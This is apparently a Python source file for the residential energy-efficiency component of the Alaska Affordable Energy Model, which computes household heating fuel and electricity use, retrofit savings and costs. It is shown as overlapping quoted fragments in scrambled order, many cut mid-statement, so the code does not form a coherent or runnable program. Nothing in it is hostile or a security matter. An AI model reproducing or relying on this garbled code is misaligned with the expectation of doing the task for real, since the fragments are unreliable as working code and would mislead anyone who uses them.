avg_EUI_reduction * self.opportunity_HH * \\", "(MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year)", "\"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost", "Object for a community forecast : Forecast forecast for a community diagnostics :", "heating cost Attributes ---------- proposed_HF_cost : np.array proposed heating fuel cost \"\"\" HF_price", "tracking error/warning messages prerequisites : dictionary of components, optional prerequisite component data this", "csv in directory Parameters ---------- directory : path output directory \"\"\" if not", "Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net", "Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential:", "calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline cost", "in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\", "Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric", "s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year df = DataFrame({", "Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost", "residential buildings (homes). Consumption and savings are based on the number of units", "Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating", "\\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption *", "---------- baseline_kWh_cost : np.array baseline cost of electricity per year \"\"\" self.cd[\"electric prices\"].index", "(kWh/year). >= 6000 \"\"\" # 500 average energy use, 12 months in a", "cordwood consumption savings_gas : float savings in natural gas fuel consumption savings_LP :", "a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]:", "self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption", "* wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec", "= community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit", "+\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for", "* kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption Attributes ----------", "0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords)", "Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat", "= self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost", "total consumption Parameters ---------- fuel_amnt: float % of fuel used total_consumption : float", "Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost", "self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME", "#~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood", "* HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price +", "r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life))", "(SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"])", "Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential:", "100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"])", "con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected", "self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption *", "the baseline kWh consumption for a community Attributes ---------- baseline_kWh_consumption : np.array electric", "= str(round(percent_accounted)) + \\ \" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg)", "self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int", "100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt", "LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption", "'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate =", "Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat", "if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption", "has no prerequisites leave empty Attributes ---------- diagnostics : diagnostics for tracking error/warning", "\\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~", "Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil", "Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat", "Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post", "(total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes:", "HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt,", "+ \\ \" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities", "self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price =", "= self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost -", "df = df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year)", "on Diagnostics Object \"\"\" def __init__ (self, community_data, forecast, diag = None, prerequisites", "Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP,", "diagnostics : diagnostics, optional diagnostics for tracking error/warning messages prerequisites : dictionary of", "(gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural", "\\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas", "general data for a community. Initial value: 'community' section of community_data comp_specs :", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year)", "price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price +", "residential buildings HH : float a # of houses cf: float conversion factor", "+\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh)", "= avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"])", "Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost,", "self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\",", "0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting to", "Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\",", "* (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh *", "($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns", ": diagnostics module, see information on Diagnostics Object \"\"\" def __init__ (self, community_data,", "Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating", "* \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas", "* HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price +", "---------- avg_kWh_consumption_per_HH : float average electric consumption per household (kWh/year). >= 6000 \"\"\"", "np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area * EUI # the one in", "- r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost", "(gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating", "= community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast", "b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year)", "Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio,", "initial consumption for each fuel type. Attributes ---------- init_HF : float initial heating", "#~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost =", "of project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop", "HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run (self, scalers =", "[kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption)", "the average monthly consumption of electricity for a house. Attributes ---------- avg_kWh_consumption_per_HH :", "Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost", "self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\", "wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\", "elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP =", ": np.array electric savings ($/year) are the difference in the base and proposed", "(MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(),", "prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData Object for", "(gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass", "All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential:", "self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component output", "\"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\":", "int estimated households for first year of project \"\"\" val = self.forecast.get_population(self.start_year) HH", "fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH", "b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP -", "\"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name']", "and savings are based on the number of units that have not been", "Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential:", "efficiency component of the Alaska Affordable Energy Model: This module estimates the potential", "Oil\"]) / 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt", "households for the first year of the project Attributes ---------- init_HH : int", "\"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All", "ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs =", "+ str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the", "* \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP =", "Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\":", "proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating", ": float total consumption for residential buildings HH : float a # of", "constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced. Returns ------- float the total", "* \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood =", "self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption", "\"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\",", "year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \"", ": forecast community forecast for estimating future values initial value: forecast cd :", "\\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def", "Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric", "based on the number of units that have not been retrofit as of", "\\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly consumption of electricity for", "self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component", "* wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price +", "self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns ------- float", "per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0]", "Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year)", "500 average energy use, 12 months in a year. That's where the 6000.0", "= b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption *", "Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost", "used total_consumption : float total consumption for residential buildings HH : float a", "consumption \"\"\" rd = self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption (MMBtu)\"]", "= np.nan LP_price = np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil =", "self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood *", "(MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(),", "+\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def", "self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption", "heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]:", "\"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\",", "capital costs. Attributes ---------- capital_costs : float total cost of improvements ($) \"\"\"", "* kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes ---------- capital_costs :", "self.base_pop))) def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the component. The Annual", "in natural gas fuel consumption savings_LP : float savings in propane consumption savings_kWh", "(1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP)", "Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat", "a type of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu", "total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas", "Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential:", "self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP", "energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption", "of the Alaska Affordable Energy Model: This module estimates the potential improvements to", "and tag[1] != 'residential': self.was_run = False self.reason = \"Not a residential project.\"", "s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas", "100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~", "Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost", "component. The Annual Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV Costs,", "class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska Affordable Energy Model: This", "Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass", "---------- init_HH : int estimated households for first year of project \"\"\" val", "HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"])", "calculated in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption)", "#~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold", "of electricity per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost", "(cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential:", "Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and Internal Rate of Return will", "consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption", "of offset heating fuels. The cost to retrofit each home is also calculated.", "HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio", "total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH", "can be retrofit savings_HF : float savings in heating oil consumption savings_wood :", "(MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"]", "= \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption =", "messages prerequisites : dictionary of components, optional prerequisite component data \"\"\" self.diagnostics =", "= self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted +=", "float initial propane consumption init_kWh : float initial electric consumption \"\"\" rd =", "self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed", "str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" +", "baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array", "HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio =", "self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def", "\"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int Houses that can be retrofit", "= community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0]", "np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH", "empty Attributes ---------- diagnostics : diagnostics for tracking error/warning messages initial value: diag", "cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self):", "Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption", "Object aaem.diagnostics : diagnostics module, see information on Diagnostics Object \"\"\" def __init__", "\"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential:", "all be calculated. There must be a known Heat Recovery project for this", "is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per house']", "amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other", "self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption Attributes", "Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption", "avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" +", "of Energy, and Internal Rate of Return will all be calculated. There must", "= self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg =", "+ \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] *", "Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost", "* constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas +", "+ \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption", "Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec,", "All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\":", "b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec -", "kWh per house']) if not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy", "self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_'", "np.array set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate", "#~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg", "Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil", "\"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline cost of electricity", "self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric", "\"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\",", "Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil,", ": np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption :", "for each fuel type. Attributes ---------- init_HF : float initial heating oil consumption", "= self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied'])", "self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh", "= self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption", "a year. That's where the 6000.0 # comes from. con_threshold = self.comp_specs['min kWh", "the total energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life]", "def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the component. The Annual Total", "Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric", "= kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~", "Electric 